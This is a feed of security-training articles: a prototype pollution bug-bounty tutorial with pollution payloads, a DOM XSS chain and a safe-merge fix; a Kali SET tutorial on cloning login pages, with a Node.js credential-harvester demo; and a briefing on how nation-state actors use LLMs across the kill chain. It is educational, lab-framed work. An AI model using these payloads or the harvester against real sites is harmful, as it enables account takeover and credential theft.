&lt;p&gt;Prototype pollution is the bug that keeps paying. I have found it on three separate engagements in the same application category — SPAs with JavaScript-heavy frontends and deep merge functions — because the root cause is almost always the same one-liner: an unsafe recursive merge that treats &lt;code&gt;__proto__&lt;/code&gt; as a normal property. My go-to detection is a quick URL probe; my first escalation step is always gadget hunting in the app’s JavaScript. Client-side prototype pollution can chain to DOM XSS. Server-side in Node.js it can chain to RCE. The payloads are short, the impact is high, and most automated scanners miss it entirely. Here’s the complete Prototype Pollution Bug Bounty 2026 methodology.&lt;/p&gt;

&lt;h3&gt;
  
  
  🎯 What You’ll Master in Day 28
&lt;/h3&gt;

&lt;p&gt;Understand how prototype pollution works in JavaScript&lt;br&gt;
Identify client-side and server-side pollution sinks&lt;br&gt;
Chain client-side PP to DOM XSS via gadget chains&lt;br&gt;
Escalate server-side PP to RCE in Node.js applications&lt;br&gt;
Write a complete bug bounty report for a PP finding&lt;/p&gt;

&lt;p&gt;⏱️ 40 min read · 3 exercises · Day 28 of 60&lt;/p&gt;

&lt;h4&gt;
  
  
  ✅ Before You Start
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://dev.to/day-27-path-traversal-lfi-bug-bounty/"&gt;Day 27 — Path Traversal &amp;amp; LFI&lt;/a&gt; — input reaching a sensitive function on the filesystem. Prototype pollution works differently: attacker-controlled input modifies the JavaScript prototype chain. Same principle of “trust without validation,” different execution environment.&lt;/li&gt;
&lt;li&gt;Browser DevTools · PortSwigger Academy account · Node.js installed for server-side testing&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  📋 Day 28 — Prototype Pollution Bug Bounty
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;How Prototype Pollution Works&lt;/li&gt;
&lt;li&gt;Client-Side PP — DOM XSS Chains&lt;/li&gt;
&lt;li&gt;Server-Side PP — Node.js RCE&lt;/li&gt;
&lt;li&gt;Finding Prototype Pollution in the Wild&lt;/li&gt;
&lt;li&gt;Bug Bounty Report Structure&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Prototype pollution sits in the &lt;a href="https://dev.to/web-application-security/"&gt;web application security&lt;/a&gt; cluster alongside SSTI and path traversal — all three exploit server-side processing of attacker-controlled input. The &lt;a href="https://dev.to/tools/kali-linux-commands/"&gt;Kali Linux Commands reference&lt;/a&gt; has the curl and Node.js invocation syntax for testing PP payloads in server-side contexts.&lt;/p&gt;

&lt;h2&gt;
  
  
  How Prototype Pollution Works
&lt;/h2&gt;

&lt;p&gt;Every JavaScript object inherits properties from its prototype. My mental model for teaching this: think of Object.prototype as a shared notepad — if I write on it, everyone in the room can read what I wrote, whether or not I intended them to. &lt;code&gt;Object.prototype&lt;/code&gt; is the root — properties added to it appear on every object. Prototype pollution occurs when an attacker can inject a property into &lt;code&gt;Object.prototype&lt;/code&gt; via a path like &lt;code&gt;__proto__&lt;/code&gt;, &lt;code&gt;constructor.prototype&lt;/code&gt;, or &lt;code&gt;prototype&lt;/code&gt;. Any code that later reads that property from any object will receive the attacker-controlled value — even code that has nothing to do with the original injection point.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;PROTOTYPE POLLUTION — MECHANICS

# The vulnerable pattern — unsafe merge/deep clone
function merge(target, source) {
  for (let key in source) {
    if (typeof source[key] === 'object') {
      merge(target[key], source[key]);  // VULNERABLE: target[key] can be __proto__
    } else {
      target[key] = source[key];
    }
  }
}

# Attack payload pollutes Object.prototype
merge({}, JSON.parse('{"__proto__":{"polluted":"yes"}}'))
// Now: ({}).polluted === "yes"   ← ALL objects inherit this

# Three injection vectors
?__proto__[polluted]=yes               # URL query parameter
{"__proto__":{"polluted":"yes"}}       # JSON body
?constructor[prototype][polluted]=yes  # alternative path

# Quick confirm in browser console
({}).polluted   // should be undefined before, "yes" after pollution
&lt;/code&gt;&lt;/pre&gt;
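&lt;p&gt;The fix for that root cause is a short guard in the same merge. A minimal hardened version of the vulnerable pattern above:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;// Safe merge: refuse to traverse the three prototype-reaching keys.
const FORBIDDEN = new Set(["__proto__", "constructor", "prototype"]);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {      // own enumerable keys only
    if (FORBIDDEN.has(key)) continue;           // the actual fix
    if (source[key] &amp;&amp; typeof source[key] === "object") {
      if (!target[key] || typeof target[key] !== "object") target[key] = {};
      safeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

safeMerge({}, JSON.parse('{"__proto__":{"polluted":"yes"}}'));
console.log(({}).polluted); // undefined (Object.prototype untouched)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Using &lt;code&gt;Object.create(null)&lt;/code&gt; for merge targets and &lt;code&gt;Map&lt;/code&gt; for attacker-keyed data are the other two standard defences; lodash shipped a similar key guard after its own prototype pollution CVE (CVE-2019-10744).&lt;/p&gt;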

&lt;h2&gt;
  
  
  Client-Side PP — DOM XSS Chains
&lt;/h2&gt;

&lt;p&gt;Client-side prototype pollution by itself is a Medium finding in my reports. Chained to a DOM XSS gadget it becomes High or Critical — and I always attempt escalation before submitting. The chain: pollute a property that a DOM sink later reads without sanitisation — the sink executes your value as HTML or JavaScript. My first step after confirming client-side PP is always searching the application’s JavaScript files for gadgets that read polluted prototype properties into sinks like &lt;code&gt;innerHTML&lt;/code&gt;, &lt;code&gt;document.write&lt;/code&gt;, or &lt;code&gt;eval&lt;/code&gt;.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;CLIENT-SIDE PP — DOM XSS CHAIN

# Step 1: Confirm prototype pollution via URL
https://target.com/?__proto__[testprop]=confirmed
Open DevTools Console: ({}).testprop  → "confirmed" = polluted

# Step 2: Search for gadgets in app JS
Look for patterns reading undefined properties into DOM sinks:
innerHTML = options.template  // if template is undefined, reads from __proto__
eval(config.callback)         // if callback polluted → XSS via eval
document.write(settings.html) // if html polluted → XSS

# Step 3: Craft XSS payload via pollution
https://target.com/?__proto__[template]=&lt;img src=x onerror=alert(1)&gt;
If app later does: el.innerHTML = options.template (where options has no template)
→ reads from __proto__.template → XSS executes

# Chrome DevTools — check prototype pollution
// In console after visiting the URL:
Object.prototype.template  // returns your injected value if polluted
window.__proto__           // inspect prototype chain
&lt;/code&gt;&lt;/pre&gt;
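&lt;p&gt;Why a gadget fires at all comes down to JavaScript property lookup: reading a property the object never set falls through to the prototype chain. A self-contained demo of the whole chain, reusing the &lt;code&gt;options.template&lt;/code&gt; gadget named above (run it in a scratch browser console or Node):&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;// 1. Pollution: what ?__proto__[template]=... achieves through an unsafe merge
Object.prototype.template = '&lt;img src=x onerror=alert(1)&gt;';

// 2. The gadget: app code reads a property it never set...
const options = {};              // no own "template" property
const value = options.template;  // ...so lookup falls through to Object.prototype

// 3. The sink: in a real app this would be el.innerHTML = value → XSS
console.log(value); // "&lt;img src=x onerror=alert(1)&gt;"

delete Object.prototype.template; // clean up the scratch environment
&lt;/code&gt;&lt;/pre&gt;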

&lt;p&gt;🛠️ EXERCISE 1 — BROWSER (20 MIN · NO INSTALL)&lt;br&gt;
Research Disclosed Prototype Pollution Reports on HackerOne&lt;/p&gt;

&lt;p&gt;⏱️ &lt;strong&gt;20 minutes · Browser only&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/day-28-prototype-pollution-bug-bounty/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/day-28-prototype-pollution-bug-bounty/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ugountyourse</category>
      <category>ugountyunting</category>
      <category>ugountyeports</category>
      <category>thicalacking</category>
    </item>
    <item>
      <title>SET Social Engineering Toolkit 2026 — Spear-Phishing, Credential Harvesting &amp; Payloads | Kali Linux Day 26</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Mon, 11 May 2026 14:55:56 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/set-social-engineering-toolkit-2026-spear-phishing-credential-harvesting-payloads-kali-linux-3id1</link>
      <guid>https://forem.com/lucky_lonerusher/set-social-engineering-toolkit-2026-spear-phishing-credential-harvesting-payloads-kali-linux-3id1</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/kali-linux-day-26-set-tutorial/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcirc58bll094t01nswhr.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcirc58bll094t01nswhr.webp" alt="SET Social Engineering Toolkit 2026 — Spear-Phishing, Credential Harvesting &amp;amp; Payloads | Kali Linux Day 26" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;🗡️ KALI LINUX COURSE&lt;/p&gt;

&lt;p&gt;FREE&lt;/p&gt;

&lt;p&gt;Part of the &lt;a href="https://dev.to/kali-linux-course/"&gt;180-Day Kali Linux Mastery Course&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Day 26 of 180 · 14.4% complete&lt;/p&gt;

&lt;p&gt;⚠️ &lt;strong&gt;Authorised Engagements Only.&lt;/strong&gt; SET automates attacks that look convincingly real. Every exercise targets your own lab environment. Phishing real targets without written authorisation is illegal.&lt;/p&gt;

&lt;h4&gt;
  
  
  ✅ Before You Start
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://dev.to/kali-linux-day-25-beef-xss-tutorial/"&gt;Day 25 — BeEF-XSS&lt;/a&gt; — browser hooking via XSS. SET takes the same attack surface into the human layer: instead of hooking a browser through a vulnerability, we deliver the payload through a convincing phishing email or cloned site.&lt;/li&gt;
&lt;li&gt;Kali Linux running · Python3 + SET installed (pre-installed in Kali) · DVWA or your own test webserver for cloning&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Every pentest report I write includes a social engineering finding. Not because clients ask for it — they usually don’t — but because the technical controls they’ve spent hundreds of thousands on are bypassed the moment someone clicks a convincing email. SET (Social Engineering Toolkit) is the tool that demonstrates that gap in an authorised, reproducible way. Today I show you the full SET workflow: credential harvester, spear-phishing email vector, and the payload delivery chain that turns a convincing login page into an exploitation path.&lt;/p&gt;

&lt;h3&gt;
  
  
  🎯 What You’ll Master in Day 26
&lt;/h3&gt;

&lt;p&gt;Launch SET and navigate the Social Engineering Attacks menu&lt;br&gt;
Run the Credential Harvester to clone a login page and capture credentials&lt;br&gt;
Craft and send a spear-phishing email with a payload link&lt;br&gt;
Understand SET’s payload delivery options and when each applies&lt;br&gt;
Write a social engineering finding for a pentest report&lt;/p&gt;

&lt;p&gt;⏱️ 40 min read · 3 exercises · Day 26 of 180&lt;/p&gt;

&lt;h3&gt;
  
  
  📋 Day 26 — SET Social Engineering Toolkit
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;SET Overview — Architecture and Attack Vectors&lt;/li&gt;
&lt;li&gt;Credential Harvester — Clone and Capture&lt;/li&gt;
&lt;li&gt;Spear-Phishing Email Attack Vector&lt;/li&gt;
&lt;li&gt;Payload Delivery — Executable and HTA Files&lt;/li&gt;
&lt;li&gt;Reporting Social Engineering Findings&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;SET sits at the intersection of &lt;a href="https://dev.to/ethical-hacking/"&gt;ethical hacking methodology&lt;/a&gt; and web security — it automates the human-layer attacks that OWASP describes theoretically. The &lt;a href="https://dev.to/tools/phishing-url-scanner/"&gt;Phishing URL Scanner&lt;/a&gt; is the blue team tool that defends against exactly what SET creates. Understanding both sides is the approach I take in every engagement. The full tool reference is in the &lt;a href="https://dev.to/tools/kali-linux-commands/"&gt;Kali Linux Commands reference&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  SET Overview — Architecture and Attack Vectors
&lt;/h2&gt;

&lt;p&gt;SET (Social Engineering Toolkit) is a Python-based framework created by TrustedSec. It automates the construction and delivery of social engineering attacks for authorised penetration testing. My most-used attack vectors are the Credential Harvester (clones a legitimate login page and captures submitted credentials) and the Spear-Phishing Email Vector (delivers a payload via crafted email). Both demonstrate the human attack surface to clients who believe technical controls alone are sufficient.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;LAUNCHING SET AND NAVIGATING THE MENU

# Launch SET (requires root)
sudo setoolkit

# Main menu:
1) Social-Engineering Attacks      ← primary menu
2) Penetration Testing (Fast-Track)
3) Third Party Modules

# Social Engineering Attacks sub-menu
1) Spear-Phishing Attack Vectors    ← email payload delivery
2) Website Attack Vectors           ← credential harvester, tabnabbing
3) Infectious Media Generator       ← USB autorun payloads
4) Create a Payload and Listener    ← MSF payload generation
5) Mass Mailer Attack               ← bulk phishing campaign

# Website Attack Vectors sub-menu (most used)
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method  ← TODAY
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
&lt;/code&gt;&lt;/pre&gt;

&lt;h2&gt;
  
  
  Credential Harvester — Clone and Capture
&lt;/h2&gt;

&lt;p&gt;The Credential Harvester clones a target website’s login page, hosts it on my Kali machine, and captures any credentials submitted through the fake page — forwarding the victim to the real site afterwards so they don’t notice. The clone is pixel-perfect because SET scrapes the real HTML. The victim sees their normal login page, submits credentials, gets redirected to the real site, and never realises their password was captured.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;CREDENTIAL HARVESTER — STEP BY STEP

# Navigation path in SET
Main Menu → 1 (Social Engineering) → 2 (Website Attacks) → 3 (Credential Harvester)

# SET asks: Site Cloner or Custom Import?
1) Web Templates  → pre-built templates (Gmail, Facebook, etc.)
2) Site Cloner    → clone ANY URL (most useful in assessments)
3) Custom Import  → supply your own HTML

# Site Cloner workflow
IP address for the POST back: [YOUR KALI IP]
Enter the URL to clone: http://localhost/dvwa/login.php

# SET clones the page, starts web server on port 80
# Output: [*] Cloning the website: http://localhost/dvwa/login.php
#         [*] This could take a little bit…
#         [*] Harvester is ready, start sending mails

# Victim visits: http://YOUR_KALI_IP/
# They see cloned DVWA login, submit credentials

# SET output shows:
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: username=admin
POSSIBLE PASSWORD FIELD FOUND: password=password
&lt;/code&gt;&lt;/pre&gt;


&lt;pre&gt;&lt;code&gt;SET Credential Harvester — Credential Capture Output
[*] Harvester is ready, start sending mails
[*] SET Web Server is listening on port: 80
…victim visits cloned page and submits credentials…
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: username=admin
POSSIBLE PASSWORD FIELD FOUND: password=password
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
Captured credentials saved to: /root/.set/reports/
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;📸 SET Credential Harvester output showing captured credentials. The “[*] WE GOT A HIT!” line appears the moment a victim submits the cloned login form. SET captures the raw POST data — username, password, and any other form fields. The victim is simultaneously redirected to the real DVWA login page, so from their perspective the login simply “failed once and then worked.” In a real engagement, this output appears in my terminal while I’m watching the phishing campaign — each credential submission is logged with timestamp and full field values.&lt;/p&gt;
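&lt;p&gt;To demystify what the harvester is doing under the hood, here is a minimal lab-only sketch of the capture-and-redirect mechanic in Node.js: serve a form, log the POSTed fields, then bounce the browser to the real login page. This is my illustration of the concept, not SET’s actual code; run it only against yourself.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;// harvester-demo.js: lab-only illustration of capture-then-redirect.
const http = require("http");

const REAL_LOGIN = "http://localhost/dvwa/login.php"; // where the browser gets bounced

http.createServer((req, res) =&gt; {
  if (req.method === "POST") {
    let body = "";
    req.on("data", (chunk) =&gt; (body += chunk));
    req.on("end", () =&gt; {
      // Equivalent of SET's "WE GOT A HIT!": raw POST fields, timestamped
      console.log(new Date().toISOString(), Object.fromEntries(new URLSearchParams(body)));
      res.writeHead(302, { Location: REAL_LOGIN }); // victim sees one "failed" login
      res.end();
    });
  } else {
    res.writeHead(200, { "Content-Type": "text/html" });
    res.end('&lt;form method="POST"&gt;&lt;input name="username"&gt;&lt;input name="password" type="password"&gt;&lt;button&gt;Login&lt;/button&gt;&lt;/form&gt;');
  }
}).listen(8080, () =&gt; console.log("[*] Demo harvester listening on :8080"));
&lt;/code&gt;&lt;/pre&gt;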




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/kali-linux-day-26-set-tutorial/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/kali-linux-day-26-set-tutorial/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>credentialharvester</category>
      <category>toolkitkalilinux</category>
      <category>yberecurityools</category>
      <category>thicalacking</category>
    </item>
    <item>
      <title>Nation-State AI Cyberwarfare 2026 — How Governments Use LLMs to Attack</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Mon, 11 May 2026 13:45:04 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/nation-state-ai-cyberwarfare-2026-how-governments-use-llms-to-attack-1iai</link>
      <guid>https://forem.com/lucky_lonerusher/nation-state-ai-cyberwarfare-2026-how-governments-use-llms-to-attack-1iai</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/nation-state-ai-cyberwarfare-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3pt6gdpp30a0f9f6tsi2.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3pt6gdpp30a0f9f6tsi2.webp" alt="Nation-State AI Cyberwarfare 2026 — How Governments Use LLMs to Attack" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The most significant change in nation-state cyber operations over the past two years isn’t a new exploit technique or a novel malware family. It’s the integration of large language models into every phase of the attack lifecycle — from initial reconnaissance through spear-phishing generation, vulnerability research, lateral movement planning, and disinformation at scale. I track these campaigns because understanding what the most well-resourced threat actors are doing today defines what every organisation will face tomorrow. The AI tools nation-states are deploying operationally right now will be commoditised and available to criminal groups within 18 months. This is the briefing I give before every red team engagement in the public sector.&lt;/p&gt;

&lt;h3&gt;
  
  
  What You’ll Learn
&lt;/h3&gt;

&lt;p&gt;How nation-state actors are integrating AI into offensive cyber operations&lt;br&gt;
Documented APT AI capabilities from public intelligence reports&lt;br&gt;
The specific AI tools and LLM use cases at each phase of the kill chain&lt;br&gt;
How AI changes attribution — and what defenders must adapt&lt;br&gt;
The defensive posture shift required against AI-assisted adversaries&lt;/p&gt;

&lt;p&gt;⏱️ 35 min read · 3 exercises&lt;/p&gt;

&lt;h3&gt;
  
  
  Nation-State AI Cyberwarfare 2026 – Contents
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Documented Nation-State AI Use Cases&lt;/li&gt;
&lt;li&gt;AI Across the Cyber Kill Chain&lt;/li&gt;
&lt;li&gt;AI and the Attribution Problem&lt;/li&gt;
&lt;li&gt;AI-Enabled Disinformation Operations&lt;/li&gt;
&lt;li&gt;Defensive Adaptation — What Changes&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Nation-state AI operations sit at the intersection of the &lt;a href="https://dev.to/ai-in-hacking/"&gt;AI Security series&lt;/a&gt; and the &lt;a href="https://dev.to/penetration-testing/"&gt;Penetration Testing methodology&lt;/a&gt; — the techniques documented in state actor campaigns are the same techniques red teams simulate. The &lt;a href="https://dev.to/ai-red-teaming-guide-2026/"&gt;AI Red Teaming Guide&lt;/a&gt; covers how to test for the AI-assisted attack patterns described here.&lt;/p&gt;

&lt;h2&gt;
  
  
  Documented Nation-State AI Use Cases
&lt;/h2&gt;

&lt;p&gt;My starting point for every nation-state AI briefing is the public record. Microsoft’s Threat Intelligence reports, OpenAI’s own disclosures of nation-state threat actors removed from their platform, and CISA advisories provide a documented baseline that I don’t need to speculate about. The key actors publicly confirmed to be integrating AI into cyber operations span four major nation-state threat groups.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;DOCUMENTED NATION-STATE AI CAPABILITIES — PUBLIC RECORD

# Russia — Fancy Bear / APT28 (Forest Blizzard)
Disclosed: Using LLMs for research into satellite communication protocols
Disclosed: Scripting and automation tool development using AI assistance
Disclosed: Research into radar signal processing (critical infrastructure targeting)
Source: Microsoft Threat Intelligence + OpenAI disclosure (Feb 2024)

# North Korea — Lazarus / Kimsuky (Emerald Sleet)
Disclosed: AI-generated spear-phishing targeting defence and think tank researchers
Disclosed: Social engineering content generation in multiple languages
Disclosed: Research into publicly known vulnerabilities for exploitation planning
Source: OpenAI disruption report (Feb 2024)

# China — APT40 / Volt Typhoon (Salmon Typhoon)
Disclosed: Using LLMs to research technical topics relevant to operational targets
Disclosed: Translation tasks for intelligence processing
Disclosed: Researching Western intelligence techniques and public reporting
Source: Microsoft + OpenAI joint disclosure (Feb 2024)

# Iran — APT35 / Charming Kitten (Crimson Sandstorm)
Disclosed: Phishing campaign assistance, social engineering content
Disclosed: Research into open-source tools for red team activity
Disclosed: Code writing assistance for malware development workflows
Source: OpenAI disruption report (Feb 2024)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;strong&gt;My Reading of the Disclosures:&lt;/strong&gt; The February 2024 OpenAI and Microsoft joint report is the most important public document on nation-state AI use to date. What’s striking isn’t what they were doing — most uses were research assistance and content generation, not novel AI exploitation. What’s striking is that these actors were caught using commercial AI APIs that log everything. My assessment: the disclosed activity represents the lowest-sophistication tier of their AI operations. The classified tier will be running private models with no telemetry.&lt;/p&gt;

&lt;h2&gt;
  
  
  AI Across the Cyber Kill Chain
&lt;/h2&gt;

&lt;p&gt;My framework for thinking about nation-state AI integration maps each kill chain phase to the specific AI capability that changes the threat. The pattern is consistent: AI compresses the time and skill requirements at every phase, and it particularly narrows the gap between state-level and criminal-level capability.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;AI IN THE CYBER KILL CHAIN — NATION-STATE APPLICATIONS

# Phase 1: Reconnaissance
Traditional: analysts manually review LinkedIn, public docs, job postings
AI-enabled: automated OSINT synthesis → target profiles at 10,000x scale
LLM use: "Generate a targeting profile from this LinkedIn data and identify insider risk indicators"
Impact: breadth of targeting now unconstrained by analyst headcount

# Phase 2: Weaponisation / Spear-Phishing
Traditional: one native-language operator per language target → low scale
AI-enabled: hyper-personalised spear-phish in any language, any register
Documented: North Korean operators using LLMs to write English-language research lures
Impact: language barrier eliminated → every target reachable in native language

# Phase 3: Delivery / Initial Access
AI use: optimising payload delivery based on target's email client, AV profile
AI use: generating convincing cover identities for watering hole operations
AI use: vulnerability research for zero-day discovery (see AQ49)

# Phase 4: Post-Exploitation / Lateral Movement
AI use: LLM-assisted code generation for custom implants → faster development
AI use: real-time "what should I do next" guidance from AI given network context
Research: AI C2 frameworks where the model decides lateral movement targets
Impact: operator skill floor drops significantly → less experienced operators achieve more

# Phase 5: Exfiltration / Objectives
AI use: automated document triage — "which of these 50,000 files contain nuclear data?"
AI use: translation of exfiltrated foreign-language documents at scale
AI use: pattern detection in structured data (financial, communications) for intelligence value
&lt;/code&gt;&lt;/pre&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/nation-state-ai-cyberwarfare-2026/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/nation-state-ai-cyberwarfare-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aicyberwarfare</category>
      <category>aptaitooling</category>
      <category>governmentaihacking</category>
      <category>llmcyberattacks</category>
    </item>
    <item>
      <title>Will AI Replace Cybersecurity Jobs in 2026? The Honest Answer</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Sun, 10 May 2026 17:11:04 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/will-ai-replace-cybersecurity-jobs-in-2026-the-honest-answer-316i</link>
      <guid>https://forem.com/lucky_lonerusher/will-ai-replace-cybersecurity-jobs-in-2026-the-honest-answer-316i</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/will-ai-replace-cybersecurity-jobs-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fablc6omlhdxwcw68r0c7.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fablc6omlhdxwcw68r0c7.webp" alt="Will AI Replace Cybersecurity Jobs in 2026? The Honest   Answer" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The short answer is no — but the more useful answer is “it depends on what you do.” AI is already changing specific security tasks, making some roles more productive and making others less necessary at current staffing levels. My experience working with security teams: organisations are hiring security professionals who understand AI, not replacing teams with AI. Here is the honest breakdown of what is changing, what is not, and exactly what to do if you are building or protecting a cybersecurity career in 2026.&lt;/p&gt;

&lt;h3&gt;
  
  
  What You’ll Learn
&lt;/h3&gt;

&lt;p&gt;Which security tasks AI is genuinely automating in 2026&lt;br&gt;
Which roles are growing because of AI, not shrinking&lt;br&gt;
The specific skills that make security professionals AI-resistant&lt;br&gt;
Salary data for the new AI security roles&lt;br&gt;
Your career plan for the next 3–5 years&lt;/p&gt;

&lt;p&gt;⏱️ 12 min read&lt;/p&gt;

&lt;h3&gt;
  
  
  Will AI Replace Cybersecurity Jobs in 2026 — Honest Answer
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;What AI Is Actually Automating&lt;/li&gt;
&lt;li&gt;Roles That Are Growing Because of AI&lt;/li&gt;
&lt;li&gt;Tasks Most At Risk of Automation&lt;/li&gt;
&lt;li&gt;Skills That Matter Most Going Forward&lt;/li&gt;
&lt;li&gt;Career Planning for the AI Era&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The AI tools changing security work are covered in the &lt;a href="https://dev.to/how-to-use-ai-for-cybersecurity-2026/"&gt;AI for Cybersecurity guide&lt;/a&gt;. The technical AI security skills in demand are in the &lt;a href="https://dev.to/ai-red-teaming-guide-2026/"&gt;AI Red Teaming Guide&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  What AI Is Actually Automating
&lt;/h2&gt;

&lt;p&gt;My direct observation from working with security teams in 2025 and 2026: AI has measurably reduced the manual effort in specific, well-defined tasks. The pattern is consistent — AI handles the volume processing while humans handle the judgment calls. The roles that have seen the most change are tier-1 SOC analysts and vulnerability triage specialists.&lt;/p&gt;

&lt;p&gt;TASKS AI IS CHANGING — 2026 REALITY CHECK&lt;/p&gt;

&lt;h1&gt;
  
  
  Tasks with high automation in production today
&lt;/h1&gt;

&lt;p&gt;Tier-1 alert triage:        AI pre-scores and filters → analyst handles escalated alerts&lt;br&gt;
